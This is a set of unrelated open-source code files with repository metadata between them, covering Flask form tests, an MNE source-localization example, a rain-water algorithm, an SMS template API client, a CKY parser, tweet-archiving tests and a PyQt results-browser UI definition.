#return glist[0] <---- The current networkx read_graphml return value
return glist # <---- returns the full list of graphs read from a file
|
bsd-3-clause
| 4,107,397,642,745,463,300 | 33.666667 | 76 | 0.67804 | false |
dlarochelle/extractor_train
|
tests/test_forms.py
|
1
|
2252
|
# -*- coding: utf-8 -*-
import pytest
from extractor_train.public.forms import LoginForm
from extractor_train.user.forms import RegisterForm
from .factories import UserFactory
class TestRegisterForm:
def test_validate_user_already_registered(self, user):
# Enters username that is already registered
form = RegisterForm(username=user.username, email='[email protected]',
password='example', confirm='example')
assert form.validate() is False
assert 'Username already registered' in form.username.errors
def test_validate_email_already_registered(self, user):
# enters email that is already registered
form = RegisterForm(username='unique', email=user.email,
password='example', confirm='example')
assert form.validate() is False
assert 'Email already registered' in form.email.errors
def test_validate_success(self, db):
form = RegisterForm(username='newusername', email='[email protected]',
password='example', confirm='example')
assert form.validate() is True
class TestLoginForm:
def test_validate_success(self, user):
user.set_password('example')
user.save()
form = LoginForm(username=user.username, password='example')
assert form.validate() is True
assert form.user == user
def test_validate_unknown_username(self, db):
form = LoginForm(username='unknown', password='example')
assert form.validate() is False
assert 'Unknown username' in form.username.errors
assert form.user is None
def test_validate_invalid_password(self, user):
user.set_password('example')
user.save()
form = LoginForm(username=user.username, password='wrongpassword')
assert form.validate() is False
assert 'Invalid password' in form.password.errors
def test_validate_inactive_user(self, user):
user.active = False
user.set_password('example')
user.save()
# Correct username and password, but user is not activated
form = LoginForm(username=user.username, password='example')
assert form.validate() is False
assert 'User not activated' in form.username.errors
|
bsd-3-clause
| -4,317,048,631,488,596,000 | 35.934426 | 74 | 0.672735 | false |
mne-tools/mne-tools.github.io
|
0.15/_downloads/plot_custom_inverse_solver.py
|
1
|
6931
|
# -*- coding: utf-8 -*-
"""
================================================
Source localization with a custom inverse solver
================================================
The objective of this example is to show how to plug a custom inverse solver
in MNE in order to facilate empirical comparison with the methods MNE already
implements (wMNE, dSPM, sLORETA, LCMV, (TF-)MxNE etc.).
This script is educational and shall be used for methods
evaluations and new developments. It is not meant to be an example
of good practice to analyse your data.
The example makes use of 2 functions ``apply_solver`` and ``solver``
so changes can be limited to the ``solver`` function (which only takes three
parameters: the whitened data, the gain matrix, and the number of orientations)
in order to try out another inverse algorithm.
"""
import numpy as np
from scipy import linalg
import mne
from mne.datasets import sample
from mne.viz import plot_sparse_source_estimates
data_path = sample.data_path()
fwd_fname = data_path + '/MEG/sample/sample_audvis-meg-eeg-oct-6-fwd.fif'
ave_fname = data_path + '/MEG/sample/sample_audvis-ave.fif'
cov_fname = data_path + '/MEG/sample/sample_audvis-shrunk-cov.fif'
subjects_dir = data_path + '/subjects'
condition = 'Left Auditory'
# Read noise covariance matrix
noise_cov = mne.read_cov(cov_fname)
# Handling average file
evoked = mne.read_evokeds(ave_fname, condition=condition, baseline=(None, 0))
evoked.crop(tmin=0.04, tmax=0.18)
evoked = evoked.pick_types(eeg=False, meg=True)
# Handling forward solution
forward = mne.read_forward_solution(fwd_fname)
###############################################################################
# Auxiliary function to run the solver
def apply_solver(solver, evoked, forward, noise_cov, loose=0.2, depth=0.8):
"""Function to call a custom solver on evoked data
This function does all the necessary computation:
- to select the channels in the forward given the available ones in
the data
- to take into account the noise covariance and do the spatial whitening
- to apply loose orientation constraint as MNE solvers
- to apply a weigthing of the columns of the forward operator as in the
weighted Minimum Norm formulation in order to limit the problem
of depth bias.
Parameters
----------
solver : callable
The solver takes 3 parameters: data M, gain matrix G, number of
dipoles orientations per location (1 or 3). A solver shall return
2 variables: X which contains the time series of the active dipoles
and an active set which is a boolean mask to specify what dipoles are
present in X.
evoked : instance of mne.Evoked
The evoked data
forward : instance of Forward
The forward solution.
noise_cov : instance of Covariance
The noise covariance.
loose : float in [0, 1] | 'auto'
Value that weights the source variances of the dipole components
that are parallel (tangential) to the cortical surface. If loose
is 0 then the solution is computed with fixed orientation.
If loose is 1, it corresponds to free orientations.
The default value ('auto') is set to 0.2 for surface-oriented source
space and set to 1.0 for volumic or discrete source space.
depth : None | float in [0, 1]
Depth weighting coefficients. If None, no depth weighting is performed.
Returns
-------
stc : instance of SourceEstimate
The source estimates.
"""
# Import the necessary private functions
from mne.inverse_sparse.mxne_inverse import \
(_prepare_gain, _check_loose_forward, is_fixed_orient,
_reapply_source_weighting, _make_sparse_stc)
all_ch_names = evoked.ch_names
loose, forward = _check_loose_forward(loose, forward)
# put the forward solution in fixed orientation if it's not already
if loose == 0. and not is_fixed_orient(forward):
forward = mne.convert_forward_solution(
forward, surf_ori=True, force_fixed=True, copy=True, use_cps=True)
# Handle depth weighting and whitening (here is no weights)
gain, gain_info, whitener, source_weighting, mask = _prepare_gain(
forward, evoked.info, noise_cov, pca=False, depth=depth,
loose=loose, weights=None, weights_min=None)
# Select channels of interest
sel = [all_ch_names.index(name) for name in gain_info['ch_names']]
M = evoked.data[sel]
# Whiten data
M = np.dot(whitener, M)
n_orient = 1 if is_fixed_orient(forward) else 3
X, active_set = solver(M, gain, n_orient)
X = _reapply_source_weighting(X, source_weighting, active_set, n_orient)
stc = _make_sparse_stc(X, active_set, forward, tmin=evoked.times[0],
tstep=1. / evoked.info['sfreq'])
return stc
###############################################################################
# Define your solver
def solver(M, G, n_orient):
"""Dummy solver
It just runs L2 penalized regression and keep the 10 strongest locations
Parameters
----------
M : array, shape (n_channels, n_times)
The whitened data.
G : array, shape (n_channels, n_dipoles)
The gain matrix a.k.a. the forward operator. The number of locations
is n_dipoles / n_orient. n_orient will be 1 for a fixed orientation
constraint or 3 when using a free orientation model.
n_orient : int
Can be 1 or 3 depending if one works with fixed or free orientations.
If n_orient is 3, then ``G[:, 2::3]`` corresponds to the dipoles that
are normal to the cortex.
Returns
-------
X : array, (n_active_dipoles, n_times)
The time series of the dipoles in the active set.
active_set : array (n_dipoles)
Array of bool. Entry j is True if dipole j is in the active set.
We have ``X_full[active_set] == X`` where X_full is the full X matrix
such that ``M = G X_full``.
"""
K = linalg.solve(np.dot(G, G.T) + 1e15 * np.eye(G.shape[0]), G).T
K /= np.linalg.norm(K, axis=1)[:, None]
X = np.dot(K, M)
indices = np.argsort(np.sum(X ** 2, axis=1))[-10:]
active_set = np.zeros(G.shape[1], dtype=bool)
for idx in indices:
idx -= idx % n_orient
active_set[idx:idx + n_orient] = True
X = X[active_set]
return X, active_set
###############################################################################
# Apply your custom solver
# loose, depth = 0.2, 0.8 # corresponds to loose orientation
loose, depth = 1., 0. # corresponds to free orientation
stc = apply_solver(solver, evoked, forward, noise_cov, loose, depth)
###############################################################################
# View in 2D and 3D ("glass" brain like 3D plot)
plot_sparse_source_estimates(forward['src'], stc, bgcolor=(1, 1, 1),
opacity=0.1)
|
bsd-3-clause
| -3,530,687,313,560,286,000 | 37.505556 | 79 | 0.633386 | false |
jiadaizhao/LeetCode
|
0401-0500/0407-Trapping Rain Water II/0407-Trapping Rain Water II.py
|
1
|
1241
|
import heapq
class Solution:
def trapRainWater(self, heightMap: List[List[int]]) -> int:
m = len(heightMap)
if m == 0:
return 0
n = len(heightMap[0])
if n == 0:
return 0
visited = [[False]*n for _ in range(m)]
pq = []
for i in range(m):
heapq.heappush(pq, (heightMap[i][0], i, 0))
visited[i][0] = True
if n > 1:
heapq.heappush(pq, (heightMap[i][n - 1], i, n - 1))
visited[i][n - 1] = True
for j in range(1, n - 1):
heapq.heappush(pq, (heightMap[0][j], 0, j))
visited[0][j] = True
if m > 1:
heapq.heappush(pq, (heightMap[m - 1][j], m - 1, j))
visited[m - 1][j] = True
vol = 0
while pq:
h, row, col = heapq.heappop(pq)
for nr, nc in (row-1, col), (row+1, col), (row, col-1), (row, col+1):
if 0 <= nr < m and 0 <= nc < n and (not visited[nr][nc]):
heapq.heappush(pq, (max(h, heightMap[nr][nc]), nr, nc))
visited[nr][nc] = True
vol += max(h - heightMap[nr][nc], 0)
return vol
|
mit
| -7,279,575,406,421,195,000 | 36.606061 | 81 | 0.423852 | false |
yunpian/yunpian-python-sdk
|
yunpian_python_sdk/api/tpl.py
|
1
|
6941
|
# -*- coding: utf-8 -*-
'''
Created on Jun 19, 2017
@author: dzh
'''
from ..model.constant import (YP_TPL_HOST, APIKEY, VERSION_V2, VERSION_V1, TEMPLATE, TPL_CONTENT, TPL_ID)
from .ypapi import YunpianApi, CommonResultHandler
class TplApi(YunpianApi):
'''模版接口 https://www.yunpian.com/api2.0/tpl.html'''
def _init(self, clnt):
super(TplApi, self)._init(clnt)
self.host(clnt.conf(YP_TPL_HOST, 'https://sms.yunpian.com'))
def get_default(self, param=None, must=[APIKEY]):
'''取默认模板
参数名 类型 是否必须 描述 示例
apikey String 是 用户唯一标识 9b11127a9701975c734b8aee81ee3526
tpl_id Long 否 模板id,64位长整形。指定id时返回id对应的默认 模板。未指定时返回所有默认模板 1
Args:
param:
Results:
Result
'''
param = {} if param is None else param
r = self.verify_param(param, must)
if not r.is_succ():
return r
h = CommonResultHandler(lambda rsp: {VERSION_V1:rsp[TEMPLATE] if TEMPLATE in rsp else None, VERSION_V2:rsp}[self.version()])
return self.path('get_default.json').post(param, h, r)
def get(self, param=None, must=[APIKEY]):
'''取模板
参数名 类型 是否必须 描述 示例
apikey String 是 用户唯一标识 9b11127a9701975c734b8aee81ee3526
tpl_id Long 否 模板id,64位长整形。指定id时返回id对应的 模板。未指定时返回所有模板 1
Args:
param:
Results:
Result
'''
param = {} if param is None else param
r = self.verify_param(param, must)
if not r.is_succ():
return r
h = CommonResultHandler(lambda rsp: {VERSION_V1:rsp[TEMPLATE] if TEMPLATE in rsp else None, VERSION_V2:rsp}[self.version()])
return self.path('get.json').post(param, h, r)
def add(self, param, must=[APIKEY, TPL_CONTENT]):
'''添加模板
参数名 类型 是否必须 描述 示例
apikey String 是 用户唯一标识 9b11127a9701975c734b8aee81ee3526
tpl_content String 是 模板内容,必须以带符号【】的签名开头 【云片网】您的验证码是#code#
notify_type Integer 否 审核结果短信通知的方式: 0表示需要通知,默认; 1表示仅审核不通过时通知; 2表示仅审核通过时通知;
3表示不需要通知 1
lang String 否 国际短信模板所需参数,模板语言:简体中文zh_cn; 英文en; 繁体中文 zh_tw; 韩文ko,日文 ja
zh_cn
Args:
param:
Results:
Result
'''
r = self.verify_param(param, must)
if not r.is_succ():
return r
h = CommonResultHandler(lambda rsp: {VERSION_V1:rsp.get(TEMPLATE), VERSION_V2:rsp}[self.version()])
return self.path('add.json').post(param, h, r)
def del_tpl(self, param, must=[APIKEY, TPL_ID]):
'''删除模板
参数名 类型 是否必须 描述 示例
apikey String 是 用户唯一标识 9b11127a9701975c734b8aee81ee3526
tpl_id Long 是 模板id,64位长整形 9527
Args:
param:
Results:
Result
'''
r = self.verify_param(param, must)
if not r.is_succ():
return r
h = CommonResultHandler(lambda rsp: {VERSION_V2:rsp}[self.version()])
return self.path('del.json').post(param, h, r)
def update(self, param, must=[APIKEY, TPL_ID, TPL_CONTENT]):
'''修改模板
参数名 类型 是否必须 描述 示例
apikey String 是 用户唯一标识 9b11127a9701975c734b8aee81ee3526
tpl_id Long 是 模板id,64位长整形,指定id时返回id对应的模板。未指定时返回所有模板 9527
tpl_content String 是
模板id,64位长整形。指定id时返回id对应的模板。未指定时返回所有模板模板内容,必须以带符号【】的签名开头 【云片网】您的验证码是#code#
notify_type Integer 否 审核结果短信通知的方式: 0表示需要通知,默认; 1表示仅审核不通过时通知; 2表示仅审核通过时通知;
3表示不需要通知 1
lang String 否 国际短信模板所需参数,模板语言:简体 中文zh_cn; 英文en; 繁体中文 zh_tw; 韩文ko,日文 ja
zh_cn
Args:
param:
Results:
Result
'''
r = self.verify_param(param, must)
if not r.is_succ():
return r
h = CommonResultHandler(lambda rsp: {VERSION_V1:rsp.get(TEMPLATE),
VERSION_V2:rsp[TEMPLATE] if TEMPLATE in rsp else rsp}[self.version()])
return self.path('update.json').post(param, h, r)
def add_voice_notify(self, param, must=[APIKEY, TPL_CONTENT]):
'''添加语音通知模版
访问方式:POST
参数:
参数名 类型 是否必须 描述 示例
apikey String 是 用户唯一标识 9b11127a9701975c734b8aee81ee3526
tpl_content String 是 模板内容,没有签名 您的验证码是#code#
notify_type Integer 否 审核结果短信通知的方式:0表示需要通知,默认;1表示仅审核不通过时通知;2表示仅审核通过时通知;3表示不需要通知 1
Args:
param:
Results:
Result
'''
r = self.verify_param(param, must)
if not r.is_succ():
return r
h = CommonResultHandler(lambda rsp: {VERSION_V2:rsp}[self.version()])
return self.path('add_voice_notify.json').post(param, h, r)
def update_voice_notify(self, param, must=[APIKEY, TPL_ID, TPL_CONTENT]):
'''修改语音通知模版
注意:模板成功修改之后需要重新审核才能使用!同时提醒您如果修改了变量,务必重新测试,以免替换出错!
参数:
参数名 类型 是否必须 描述 示例
apikey String 是 用户唯一标识 9b11127a9701975c734b8aee81ee3526
tpl_id Long 是 模板id,64位长整形。指定id时返回id对应的模板。未指定时返回所有模板 9527
tpl_content String 是 模板id,64位长整形。指定id时返回id对应的模板。未指定时返回所有模板模板内容 您的验证码是#code#
Args:
param:
Results:
Result
'''
r = self.verify_param(param, must)
if not r.is_succ():
return r
h = CommonResultHandler(lambda rsp: {VERSION_V2:rsp}[self.version()])
return self.path('update_voice_notify.json').post(param, h, r)
|
mit
| -3,225,037,988,573,082,600 | 32.748466 | 132 | 0.577168 | false |
wilkeraziz/notebooks
|
MoL_June15/parser.py
|
1
|
3853
|
from cfg import read_grammar_rules, WCFG
from rule import Rule
from symbol import is_terminal, is_nonterminal, make_symbol
from collections import defaultdict
from item import Item
from agenda import Agenda
def cky_axioms(cfg, sentence):
"""
Axioms for CKY.
Inference rule:
-------------------- (X -> alpha) in cfg and 0 <= i < n
[X -> * alpha, [i]]
:param cfg: a context-free grammar (an instance of WCFG)
:param sentence: the input sentence (as a list or tuple)
:returns: a list of items
"""
items = []
for rule in cfg:
for i in range(len(sentence)): # from zero to n-1
items.append(Item(rule, [i]))
return items
def scan(item, sentence):
"""
Scan a terminal (compatible with CKY and Earley).
Inference rule:
[X -> alpha * x beta, [i ... j]]
------------------------------------ sentence[j] == x
[X -> alpha x * beta, [i ... j + 1]]
:param item: an active Item
:param sentence: a list/tuple of terminals
:returns: an Item or None
"""
assert is_terminal(item.next), 'Only terminal symbols can be scanned, got %s' % item.next
if item.dot < len(sentence) and sentence[item.dot] == item.next:
return item.advance(item.dot + 1)
else:
return None
def complete(item, agenda):
"""
Move dot over nonterminals (compatible with CKY and Earley).
Inference rule:
[X -> alpha * Y beta, [i ... k]] [Y -> gamma *, [k ... j]]
----------------------------------------------------------
[X -> alpha Y * beta, [i ... j]]
:param item: an active Item.
if `item` is complete, we advance the dot of incomplete passive items to `item.dot`
otherwise, we check whether we know a set of positions J = {j1, j2, ..., jN} such that we can
advance this item's dot to.
:param agenda: an instance of Agenda
:returns: a list of items
"""
items = []
if item.is_complete():
# advance the dot for incomplete items waiting for item.lhs spanning from item.start
for incomplete in agenda.waiting(item.lhs, item.start):
items.append(incomplete.advance(item.dot))
else:
# look for completions of item.next spanning from item.dot
ends = set()
for complete in agenda.complete(item.next, item.dot):
ends.add(complete.dot)
# advance the dot of the input item for each position that complete a span
for end in ends:
items.append(item.advance(end))
return items
def make_forest(complete_items):
"""
Turn complete items into a WCFG.
:param complete_items: complete items (iterable)
:returns: a WCFG
"""
forest = WCFG()
for item in complete_items:
lhs = make_symbol(item.lhs, item.start, item.dot)
rhs = []
for i, sym in enumerate(item.rule.rhs):
rhs.append(make_symbol(sym, item.state(i), item.state(i + 1)))
forest.add(Rule(lhs, rhs, item.rule.prob))
return forest
def make_chart(complete_items, n):
chart = [[defaultdict(list) for j in range(n)] for i in range(n)] # n by n matrix with edges
for item in complete_items:
chart[item.start][item.dot][item.lhs].append((item.rule, item.dots_))
return chart
def cky(cfg, sentence):
A = Agenda()
for item in cky_axioms(cfg, sentence):
A.push(item)
while A:
item = A.pop()
if item.is_complete() or is_nonterminal(item.next):
for new in complete(item, A):
A.push(new)
else:
new = scan(item, sentence)
if new is not None:
A.push(new)
A.make_passive(item)
return make_forest(A.itercomplete())
|
apache-2.0
| 5,860,028,394,567,559,000 | 32.224138 | 101 | 0.568129 | false |
jkpr/pma-api
|
pma_api/__init__.py
|
1
|
1033
|
"""Definition of application object."""
from flask import Blueprint, jsonify
from flask_sqlalchemy import SQLAlchemy
from flask_cors import CORS
from config import config
db = SQLAlchemy()
# pylint: disable=wrong-import-position
from .app import PmaApiFlask
from .response import QuerySetApiResult
root = Blueprint('root', __name__)
@root.route('/version')
def show_version():
"""Show API version data."""
return jsonify(QuerySetApiResult.metadata())
def create_app(config_name):
"""Create configured Flask application.
Args:
config_name (str): Name of the configuration to be used.
Returns:
Flask: Configured Flask application.
"""
app = PmaApiFlask(__name__)
app.config.from_object(config[config_name])
CORS(app)
db.init_app(app)
app.register_blueprint(root)
from .api_1_0 import api as api_1_0_blueprint
app.register_blueprint(api_1_0_blueprint, url_prefix='/v1')
app.add_url_rule('/', view_func=lambda: 'To be implemented.')
return app
|
mit
| -3,959,312,989,697,954,000 | 20.978723 | 65 | 0.692159 | false |
az0/tweets2sql
|
test_tweets2sql.py
|
1
|
1976
|
#!/usr/bin/env python
# vim: ts=4:sw=4:expandtab
## tweets2sql
## Copyright (C) 2013 Andrew Ziem
## https://github.com/az0/tweets2sql
##
## This program is free software: you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation, either version 3 of the License, or
## (at your option) any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
Test tweets2sql using pytest <http://pytest.org/>
"""
from tweets2sql import *
import os
import pytest
@pytest.fixture()
def connection(tmpdir):
tmpfile = tmpdir.join('archive.sqlite')
connect_sql("sqlite:///%s" % tmpfile)
def test_TimelineTweet(connection):
"""Test TimelineTweet with mock data"""
tl = Timeline(screen_name='test_user')
# insert mock data
tdate = twitterdate("Wed Aug 29 17:12:58 +0000 2012")
text = u'\ucef4\ud328'
tid = 240859602684612608
tlt = TimelineTweet(id=tid, user_id=161651238,
user_screen_name='test',
text=text, created_at=tdate,
source='Twitter', timeline=tl)
assert(tlt.id == tid)
# retrieve it
tlt2 = TimelineTweet.get(tid)
# compare
assert(text == tlt.text)
def test_TimelineArchiver(connection):
"""Test TimelineArchiver with Twitter connection"""
twitter_search = connect_twitter()
ta = TimelineArchiver('bleachbit', twitter_search)
archive_loop(ta)
results = Timeline.selectBy(screen_name = 'bleachbit')
assert(results.count() == 1)
results = TimelineTweet.selectBy(user_screen_name = 'bleachbit')
assert(results.count() > 0)
|
gpl-3.0
| 6,015,416,128,891,507,000 | 28.492537 | 72 | 0.695344 | false |
apdjustino/DRCOG_Urbansim
|
src/opus_gui/results_manager/views/ui_results_browser.py
|
1
|
12710
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file '/Users/ckla/Documents/workspace/opus_trunk/opus_gui/results_manager/views/results_browser.ui'
#
# Created: Sun May 10 17:20:29 2009
# by: PyQt4 UI code generator 4.4.4
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
class Ui_ResultsBrowser(object):
def setupUi(self, ResultsBrowser):
ResultsBrowser.setObjectName("ResultsBrowser")
ResultsBrowser.resize(819, 744)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(ResultsBrowser.sizePolicy().hasHeightForWidth())
ResultsBrowser.setSizePolicy(sizePolicy)
self.gridLayout_4 = QtGui.QGridLayout(ResultsBrowser)
self.gridLayout_4.setObjectName("gridLayout_4")
self.splitter_2 = QtGui.QSplitter(ResultsBrowser)
self.splitter_2.setOrientation(QtCore.Qt.Vertical)
self.splitter_2.setObjectName("splitter_2")
self.groupBox_3 = QtGui.QGroupBox(self.splitter_2)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.groupBox_3.sizePolicy().hasHeightForWidth())
self.groupBox_3.setSizePolicy(sizePolicy)
self.groupBox_3.setAutoFillBackground(False)
self.groupBox_3.setFlat(False)
self.groupBox_3.setObjectName("groupBox_3")
self.verticalLayout = QtGui.QVBoxLayout(self.groupBox_3)
self.verticalLayout.setObjectName("verticalLayout")
self.configSplitter = QtGui.QSplitter(self.groupBox_3)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.configSplitter.sizePolicy().hasHeightForWidth())
self.configSplitter.setSizePolicy(sizePolicy)
self.configSplitter.setOrientation(QtCore.Qt.Horizontal)
self.configSplitter.setHandleWidth(12)
self.configSplitter.setObjectName("configSplitter")
self.groupBox = QtGui.QGroupBox(self.configSplitter)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(2)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.groupBox.sizePolicy().hasHeightForWidth())
self.groupBox.setSizePolicy(sizePolicy)
self.groupBox.setBaseSize(QtCore.QSize(0, 100))
self.groupBox.setFlat(True)
self.groupBox.setObjectName("groupBox")
self.verticalLayout_4 = QtGui.QVBoxLayout(self.groupBox)
self.verticalLayout_4.setSpacing(0)
self.verticalLayout_4.setMargin(0)
self.verticalLayout_4.setObjectName("verticalLayout_4")
self.lst_available_runs = QtGui.QListWidget(self.groupBox)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Preferred, QtGui.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(4)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.lst_available_runs.sizePolicy().hasHeightForWidth())
self.lst_available_runs.setSizePolicy(sizePolicy)
self.lst_available_runs.setMinimumSize(QtCore.QSize(0, 0))
self.lst_available_runs.setMaximumSize(QtCore.QSize(16777215, 16777215))
self.lst_available_runs.setBaseSize(QtCore.QSize(100, 50))
self.lst_available_runs.setAlternatingRowColors(True)
self.lst_available_runs.setObjectName("lst_available_runs")
self.verticalLayout_4.addWidget(self.lst_available_runs)
self.groupBox_2 = QtGui.QGroupBox(self.configSplitter)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Preferred, QtGui.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(1)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.groupBox_2.sizePolicy().hasHeightForWidth())
self.groupBox_2.setSizePolicy(sizePolicy)
self.groupBox_2.setBaseSize(QtCore.QSize(20, 0))
self.groupBox_2.setFlat(True)
self.groupBox_2.setObjectName("groupBox_2")
self.verticalLayout_3 = QtGui.QVBoxLayout(self.groupBox_2)
self.verticalLayout_3.setSpacing(0)
self.verticalLayout_3.setMargin(0)
self.verticalLayout_3.setObjectName("verticalLayout_3")
self.lst_years = QtGui.QListWidget(self.groupBox_2)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Preferred, QtGui.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(1)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.lst_years.sizePolicy().hasHeightForWidth())
self.lst_years.setSizePolicy(sizePolicy)
self.lst_years.setMinimumSize(QtCore.QSize(0, 0))
self.lst_years.setMaximumSize(QtCore.QSize(16777215, 16777215))
self.lst_years.setBaseSize(QtCore.QSize(20, 50))
self.lst_years.setAlternatingRowColors(True)
self.lst_years.setObjectName("lst_years")
self.verticalLayout_3.addWidget(self.lst_years)
self.groupBox_4 = QtGui.QGroupBox(self.configSplitter)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(5)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.groupBox_4.sizePolicy().hasHeightForWidth())
self.groupBox_4.setSizePolicy(sizePolicy)
self.groupBox_4.setBaseSize(QtCore.QSize(500, 0))
self.groupBox_4.setFlat(True)
self.groupBox_4.setObjectName("groupBox_4")
self.verticalLayout_2 = QtGui.QVBoxLayout(self.groupBox_4)
self.verticalLayout_2.setSpacing(0)
self.verticalLayout_2.setMargin(0)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.indicator_table = QtGui.QTableWidget(self.groupBox_4)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Preferred, QtGui.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(7)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.indicator_table.sizePolicy().hasHeightForWidth())
self.indicator_table.setSizePolicy(sizePolicy)
self.indicator_table.setMinimumSize(QtCore.QSize(0, 0))
self.indicator_table.setBaseSize(QtCore.QSize(500, 50))
self.indicator_table.setEditTriggers(QtGui.QAbstractItemView.NoEditTriggers)
self.indicator_table.setDragDropOverwriteMode(False)
self.indicator_table.setAlternatingRowColors(True)
self.indicator_table.setSelectionMode(QtGui.QAbstractItemView.ExtendedSelection)
self.indicator_table.setSelectionBehavior(QtGui.QAbstractItemView.SelectRows)
self.indicator_table.setTextElideMode(QtCore.Qt.ElideNone)
self.indicator_table.setShowGrid(True)
self.indicator_table.setColumnCount(3)
self.indicator_table.setObjectName("indicator_table")
self.indicator_table.setColumnCount(3)
self.indicator_table.setRowCount(0)
self.verticalLayout_2.addWidget(self.indicator_table)
self.verticalLayout.addWidget(self.configSplitter)
self.horizontalLayout = QtGui.QHBoxLayout()
self.horizontalLayout.setObjectName("horizontalLayout")
spacerItem = QtGui.QSpacerItem(40, 2, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.horizontalLayout.addItem(spacerItem)
self.cb_auto_gen = QtGui.QCheckBox(self.groupBox_3)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Fixed, QtGui.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.cb_auto_gen.sizePolicy().hasHeightForWidth())
self.cb_auto_gen.setSizePolicy(sizePolicy)
self.cb_auto_gen.setTristate(False)
self.cb_auto_gen.setObjectName("cb_auto_gen")
self.horizontalLayout.addWidget(self.cb_auto_gen)
self.verticalLayout.addLayout(self.horizontalLayout)
self.horizontalLayout_2 = QtGui.QHBoxLayout()
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
self.lbl_current_selection = QtGui.QLabel(self.groupBox_3)
font = QtGui.QFont()
font.setWeight(75)
font.setBold(True)
self.lbl_current_selection.setFont(font)
self.lbl_current_selection.setObjectName("lbl_current_selection")
self.horizontalLayout_2.addWidget(self.lbl_current_selection)
spacerItem1 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.horizontalLayout_2.addItem(spacerItem1)
self.verticalLayout_5 = QtGui.QVBoxLayout()
self.verticalLayout_5.setObjectName("verticalLayout_5")
self.pb_generate_results = QtGui.QPushButton(self.groupBox_3)
self.pb_urbancanvas = QtGui.QPushButton(self.groupBox_3)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Fixed, QtGui.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.pb_generate_results.sizePolicy().hasHeightForWidth())
self.pb_generate_results.setSizePolicy(sizePolicy)
self.pb_generate_results.setMinimumSize(QtCore.QSize(0, 0))
self.pb_generate_results.setObjectName("pb_generate_results")
self.verticalLayout_5.addWidget(self.pb_generate_results)
sizePolicy.setHeightForWidth(self.pb_urbancanvas.sizePolicy().hasHeightForWidth())
self.pb_urbancanvas.setSizePolicy(sizePolicy)
self.pb_urbancanvas.setMinimumSize(QtCore.QSize(0, 0))
self.pb_urbancanvas.setObjectName("pb_urbancanvas")
self.verticalLayout_5.addWidget(self.pb_urbancanvas)
self.horizontalLayout_2.addLayout(self.verticalLayout_5)
self.verticalLayout.addLayout(self.horizontalLayout_2)
self.tabwidget_visualizations = QtGui.QTabWidget(self.splitter_2)
self.tabwidget_visualizations.setMinimumSize(QtCore.QSize(0, 200))
self.tabwidget_visualizations.setObjectName("tabwidget_visualizations")
self.starttab = QtGui.QWidget()
self.starttab.setObjectName("starttab")
self.tabwidget_visualizations.addTab(self.starttab, "")
self.gridLayout_4.addWidget(self.splitter_2, 0, 0, 1, 1)
self.retranslateUi(ResultsBrowser)
self.tabwidget_visualizations.setCurrentIndex(0)
QtCore.QMetaObject.connectSlotsByName(ResultsBrowser)
def retranslateUi(self, ResultsBrowser):
ResultsBrowser.setWindowTitle(QtGui.QApplication.translate("ResultsBrowser", "Result Browser", None, QtGui.QApplication.UnicodeUTF8))
self.groupBox_3.setTitle(QtGui.QApplication.translate("ResultsBrowser", "Configure an indicator to view", None, QtGui.QApplication.UnicodeUTF8))
self.groupBox.setTitle(QtGui.QApplication.translate("ResultsBrowser", "Simulation Runs", None, QtGui.QApplication.UnicodeUTF8))
self.groupBox_2.setTitle(QtGui.QApplication.translate("ResultsBrowser", "Years", None, QtGui.QApplication.UnicodeUTF8))
self.groupBox_4.setTitle(QtGui.QApplication.translate("ResultsBrowser", "Indicators", None, QtGui.QApplication.UnicodeUTF8))
